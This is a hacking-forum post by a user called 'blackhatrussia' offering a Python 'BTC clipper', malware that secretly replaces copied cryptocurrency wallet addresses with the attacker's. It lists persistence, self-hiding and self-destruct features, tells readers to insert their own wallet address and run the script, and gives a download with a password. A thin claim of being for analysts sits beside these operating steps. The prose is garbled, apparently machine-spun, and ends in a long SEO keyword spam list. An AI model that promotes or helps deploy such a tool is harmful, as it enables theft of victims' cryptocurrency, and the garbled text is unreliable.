ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements

BTC Clipper

by blackhatrussia - 01-24-2023 - 08:21 AM
[Image: 107109844-67b4c400-687e-11eb-8c48-823db42d1808.gif]

BTC Clipper

==========

a BTC Clipper or a "Bitcoin Clipper" is a kind of malware designed to goal cryptocurrency transactions.

It operates by means of changing the recipient cryptocurrency pockets addresses with ones owned by way of the cyber criminals. This device demonstrates how sure cyber criminals redirect cryptocurrency transactions by way of changing clipboard data. When customers reproduction the addresses of cryptowallets that they want to use to switch bitcoin to, the copied statistics is stealthily changed through the attacker's.

When the clipboard records is pasted, the addresses belong to the criminals' cryptocurrency wallets alternatively of being the cryptocurrency pockets for the supposed recipient.

This is a task created to make it less complicated for malware analysts or normal customers to recognize how Bitcoin clippers work and can be used for analysis, research, reverse engineering, or review.

Please be positive to recognize what you are doing (such as understanding how to cast off it) due to the fact when the .py file is run due to the fact it does adjust some stuff in your gadget such as your Startup registry.

Features

AUTO STARTUP (PATH FOR .py + REGISTRY ENTRY)
SELF DESTRUCT
REPLICATE AND HIDE
No external Python modules required
Add self destruct message

How to use

Change BTC_ADDRESS to wallet address.
Change self destruct message
Run -> python btcClip.py

Password 1111

DOWNLOAD

Password 1111
bitcoin clipper,crypto clipper,btc clipper detector,btc clipper builder,btc clipper remover,btc clipper download,btc clipper c#,crypto clipper download,freya bitcoin clipper builder,bitcoin-cli examples,bitcoin clipper github,bitcoin clip art,crypto clip art,cryptocurrency clip art,clippers crypto arena,crypto arena clippers seating chart,bitcoin logo clip art,can i use my credit card to buy bitcoin at bitcoin atm,crypto.com clippers,bitcoin customer care,clipper crypto exchange,bitcoin clipper holder,bitcoin clipper history,bitcoin clipper hack,bitcoin clipper hq,bitcoin clipper how,bitcoin clipper in pakistan,bitcoin clipper instagram,bitcoin clipper india,bitcoin clipper in urdu,bitcoin clipper id,bitcoin clipper jobs,bitcoin clipper java,bitcoin clipper javascript,bitcoin clipper jet,bitcoin clipper kit,bitcoin clipper karachi,bitcoin clipper kit price in pakistan,bitcoin clipper keychain,bitcoin clipper key,bitcoin clipper lighter,bitcoin clipper login,bitcoin clipper logo,bitcoin clipper limited,bitcoin clipper malware,bitcoin clipper name,bitcoin clipper news,bitcoin clipper not working,bitcoin clipper number,bitcoin clipper node,bitcoin clipper online,bitcoin clipper order,bitcoin clipper on twitter,bitcoin clipper on youtube,bitcoin clipper on binance,bitcoin clipper price,bitcoin clipper price in pakistan,bitcoin clipper pack,bitcoin clipper price prediction,bitcoin clipper qr code,bitcoin clipper qr,bitcoin clipper quiz,bitcoin clipper quetta,bitcoin clipper ship,bitcoin clipper software,bitcoin clipper set,bitcoin clipper software download,bitcoin clipper software free download,bitcoin clipper video,bitcoin clipper v2,bitcoin clipper tradingview,bitcoin clipper twitter,bitcoin clipper tool,bitcoin clipper time,bitcoin clipper timer,bitcoin clipper url,bitcoin clipper usa,bitcoin clipper use,bitcoin clipper wallet,bitcoin clipper website,bitcoin clipper wallet extension,bitcoin clipper wallet ledger,bitcoin clipper xyz,bitcoin clipper xmas,bitcoin clipper youtube,bitcoin clipper yt,bitcoin clipper year,bitcoin clipper youtube channel,bitcoin clipper yearbook,bitcoin atm explained,whats a bitcoin clipper,bitcoin to bits,how to buy bitcoin near me,crypto-btc.co review,crypto bitcoin price in pakistan,crypto bubble com,bitcoin clipper zip,bitcoin clipper zone,bitcoin clipper zipper,bitcoin clipper zero,bitcoin clipper zip code,bitcoin heute,g bitcoin price,how to buy bitcoin in bitpanda,live btc analysis,latest bitcoin crash,how to buy bitcoin at the bitcoin atm machine,i bitcoin to pkr,i bitcoin price in pakistan,i btc to pkr,is bitcoin crashed,one bitcoin price in pakistan,bitcoin olx,online bitcoin earning,one bitcoin to pkr,remove bitcoin clipper,usb bitcoin miner price in pakistan,today bitcoin usd,bitcoin thermocap,how to use cash to buy bitcoin at bitcoin machine,yahoo business news crypto,what is bitcoin currency,where is bitcoin wallet address,where to buy cryptocurrency in pakistan,when bitcoin will go up again,when btc will drop,when btc go up,when btc will pump,how bitcoin works in pakistan,how crypto mining machine works,how much bitcoin have waqar zaka,how we use bitcoin,why bitcoin crashing today,why btc crash,who has the most bitcoin in pakistan,whitebit coin,who owns most bitcoin in pakistan,is bitcoin banned in pakistan,is bitcoin illegal in pakistan,is bitcoin halal or haram,can you mine bitcoin in pakistan,can we trade cryptocurrency in pakistan,most bitcoin holder in pakistan,will bitcoin rise or fall,will bitcoin dump again,will bitcoin finish,best bitcoin app in pakistan,best bitcoin wallet in pakistan,best hair clipper in pakistan,bitcoin worst crash,top bitcoin holders in pakistan,top crypto experts in the world,top crypto indicator,will btc go up or down

Users browsing: 1 Guest(s)